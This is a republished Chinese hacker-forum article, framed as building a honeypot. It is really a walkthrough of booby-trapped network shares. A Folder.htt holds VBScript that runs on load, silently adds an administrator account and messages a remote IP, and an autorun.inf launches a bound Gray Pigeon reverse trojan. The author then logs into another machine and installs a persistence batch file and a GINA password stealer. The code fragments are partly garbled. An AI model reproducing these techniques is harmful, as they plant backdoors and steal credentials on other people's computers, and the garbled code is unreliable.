文章 | 入侵攻击 | 安全防御 | 电脑知识 | 建站技术 | 网络编程 | 网络知识 | 工具使用 | 新闻资讯 | 安全公告

下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创作品 | 动画教程

论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 被黑网站 | 美女贴图 | 会员照片 | 在线服务 | 网站首页

  当前位置:主页 > 技术文摘 > 安全防范 > 文章内容   您对新版的建议

自己制作蜜罐捕捉入侵者


www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 

比较老的一篇文章了,但是自认为是比较成功的一篇。发表于黑客在线第3期

 常在河边走,哪有不湿鞋,本人因为经常和一些黑友打交道,自然遭受过许多入侵,被扫描更是难免。前几天上网时,网速突然暴慢,我关了QQ和所有的网络应用软件后,右下角的网络连接图标还是闪个不停,莫非是被人扫描了?可是我没装防火墙(大家可不要学我),于是我想到了用嗅探器看看,一嗅果然嗅出了名堂,如图1。
 看到了吧,从XXX.XXX.XXX.99机的4854端口发送数据包到我机(xxx.xxx.xxx.58)的1433端口,又返回去,这是典型被扫描的症状。我的机子更本没有SQL-SERVER哪来的1433端口?100%是被扫了,拿到IP后,先看看是有没有跟QQ上好友是一样的,看了一下没有,不管这些先用流光判断对方的系统,
。对方是NT,那就好半了,先用x-scan扫一下。听了一首歌后发现没有弱口令,开了以下端口:

端口21开放:FTP(Control)

端口139开放:NETBIOSSessionService

端口443开放:HttpS,SecureHTTP

端口445开放:Microsoft-DS

端口3389开放:Windows2000remoteadmin

暴力破解21端口?太耗时间几率也小,139?NETBOIS?没口令一切都是空谈,3389?输入法?大海捞针。
 于是我决定来此引狼入室,再来个瓮中捉鳖,其实蜜罐就是这道理。开工喽,首先先打开注册表,把空连接打开(注:把注册表里HKEY_LOCAL_MACHINE\\\\\\\\SYSTEM\\\\\\\\CurrentControlSet\\\\\\\\Control\\\\\\\\LsarestrictanonymousREG_DWORD0x2改为0x0,关闭所有共享,只把3个文件夹的共享打开,第一个文件夹里放置两个文件:Folder.htt,desktop.ini。
如图2
Folder.htt太长,这里省略,想看的请下载完整版。

此文件可以在WINDOWS目录下找到,不过先要设置为“显示系统保护文件”

用记事本打开,在一段代码与另一段代码之间插入以下代码,
其中关键代码为:
<scriptlanguage=vbscript>
   functionmuma()
   dimwsh
   setwsh=CreateObject(")
   wsh.runuseraaaaa/add\\\\\\",0
   wsh.runlocalgroupadministratorsaaa/add\\\\\\",0
   wsh.runsend123.123.123.123狼来拉
   endfunction
   </script>
 <BODYonload=\\\\\\"vbscript:muma()\\\\\\">

desktop.ini的代码为:
[ExtShellFolderViews]
Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt

[.ShellClassInfo]
ConfirmFileOp=0

制作方法很简单,就再现成的folder文件代码中添加以上代码就可以拉
文件夹和Folder.htt的属性设置为,并把Folder.htt和desktop.ini隐藏,最后把文件夹选项改为允许文件夹中使用WEB,如图3,只读只要对方访问了第这个文件夹,就自动生成一个用户名为aaa密码aa,并向123.123.123.123发送狼来的短信。
第2个文件夹也放两个文件:autorun.inf和flash.exe
flash.exe是灰鸽子反弹木马,马中极品。
autorun.inf代码如下:
[AutoRun]
OPEN=flash.exe/autorun
只要对方访问了第这个文件夹,会自动运行flash.exe
避免被发现已经和另一个flash动画合并了。
步骤:
1,启动BindFile,如图6
2,添加要合并的软件,这里我们添加HGZ.EXE和FLASH
(注:由于合并器默认只支持EXE文件,我们添加时再添加框内输入:*.*就会出现所有文件这事就可以添文件拉)
为了保险起见我还把AUTORUN隐藏了,只要右键点击后进入属性里把隐藏打上勾,再点应用OK拉
第3个文件夹只是放了几个无用的文件,做个幌子罢了。
接下来就室设置权限了,在user组里创建一个名为shuangfeng的帐号,密码为空,创建的方法:
进入计算机管理,在点本地用户和组,进入组然后双击USERS,入图4,点添加,对象名称里的方框里输入
shuangfeng,点应用OK。
把三个文件夹的共享都打开,进入安全把USER的权限中“读取和运行”“列出文件夹目录”“读取”打上勾,接着就是等他上钩了,如图5现在只等他进来了。
 果然,几分钟后就收到了“狼来了拉”的短信,但没有灰鸽子的回应,看来是被杀了,树大招风啊。于是我马上登陆他的3389,用AAA帐号进去了,观察了一下,果然是肉鸡。先用CA克隆了guest,再删除AAA用户,方法如下:
在CMD里输入caaaaaaguestshuangfeng
接着在肉鸡命令行输入:netuseraaa/del
再写个BAT,内容如下:
time/t>>TSLog.log
netstat-n-ptcp|find
startExplorer
用记事本编辑以后存为3389.bat,放到d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\里
我来解释一下这个文件的含义:

  第一行是记录用户登录的时间,time/t的意思是直接返回系统时间(如果不加/t,系统会等待你输入新的时间),然后我们用追加符号"把这个时间记入TSLog.log作为日志的时间字段;

  第二行是记录用户的IP地址,netstat是用来显示当前网络连接状况的命令,-n表示显示IP和端口而不是域名、协议,-ptcp是只显示tcp协议,然后我们用管道符号"把这个命令的结果输出给find命令,从输出结果中查找包含"的行(这就是我们要的客户的IP所在的行,如果你更改了终端服务的端口,这个数值也要作相应的更改),最后我们同样把这个结果重定向到日志文件TSLog.log中去,于是在SLog.log文件中,记录格式如下:

  22:40
  TCP  192.168.12.28:3389  192.168.10.123:4903   ESTABLISHED
  22:54
  TCP  192.168.12.28:3389  192.168.12.29:1039   ESTABLISHED

  也就是说只要这个TSLog.bat文件一运行,所有连在3389端口上的IP都会被记录
再写入HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\新建一个建值,内容为d:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\3389.bat
最后下载一个牛族nt/2000/xp密码大盗,在CMD下输入:gina-intall接着显示:
========WindowsNT/2000/XP/.NETSERVER2003PasswordDumperV1.0===========
=====PoweredBytiaozi,Welcometooursite=========

Usage:
   Gina-install|-remove

   -install    InstallGinaDllinordertogetLogonuser\\\\\\\’sPassword
   -remove    RemoveGinaDllandrestoredefaultGinaDll
Warning:ThisoptionneedadministratorPrivilegeofLocalMachine!
     PleaseDon\\\\\\\’tusethisprogramtohacker!GoodLuck!:-)


D:\\\\\\\\DocumentsandSettings\\\\\\\\aaa\\\\\\\\桌面>gina-install

========WindowsNT/2000/XP/.NETSERVER2003PasswordDumperV1.0===========
=====PoweredBytiaozi,Welcometooursite=========

Workingnow,PleaseStandby...-

STEP1:

 SourceFile:D:\\\\\\\\DocumentsandSettings\\\\\\\\maomao\\\\\\\\桌面
 TargetFile:D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\SysGina32.dll
 CopyGinaDllOptionSuccess!

STEP2:
 GinaDllWasSettoRegisterSuccess...

AllDone,Thepasswordwillbesaveto[D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt]
只要有人登陆后就会记录再D:\\\\\\\\winnt\\\\\\\\System32\\\\\\\\GinaPwd.txt里
接着我重起了肉机。
10分钟后我再次登陆了肉鸡,TClog.log上清清楚楚写这登陆着的IP,仔细一看,果然跟我的QQ中的一个人的IP一样,我在D:\\\\\\\\WINDOWS\\\\\\\\System32\\\\\\\\GinaPwd.txt得到他的密码后就撤了,因为我已经利用了这个简单的密罐完成了这次反入侵。如果我想的话可以用同样的方式在肉鸡上给那个人下个套,但我没这样,只留了个文本文件告诉了管理员就走了。剩下的事就事找那个人了。

   ---------------------------------------------------------------------------------------------------
  上一篇:确保远程访问安全的五招秘笈
  下一篇:网站服务器通用和专用保护方法比较分析
   ---------------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
15高招打造一道超级电脑防
病毒快报:通过QQ完全控制
教你五招 提速杀毒软件运
对症下药 教你清除电脑中
局域网管理方案效果评测:
卡巴斯基全功能安全软件20
:"无法删除病毒"不在烦恼
win2000/XP系统 如何防范
检测你的Web系统有多少安
虚拟网关解决ARP攻击
教菜鸟彻底干掉灰鸽子
警惕!网址在复制粘贴过程
网管员经验心得 局域网管
讲解SQL Server数据库被挂
防范网页木马的攻击
遭受入侵后的证据有哪些?
教你如何检查自己电脑是否
端口招蜂引蝶 防范用135端
七步让木马与你断绝关系
电信骨干网DDoS攻击防护解
彻底防范网页木马,给IE穿
电脑“铁布衫”校园网安全
病毒命名规则大检阅 教你
堵住病毒传播 遏制电脑反
在 Windows中加固TCP/IP协
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2009 Www.Hx99.Net
版本:华西黑盟网站系统V6.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号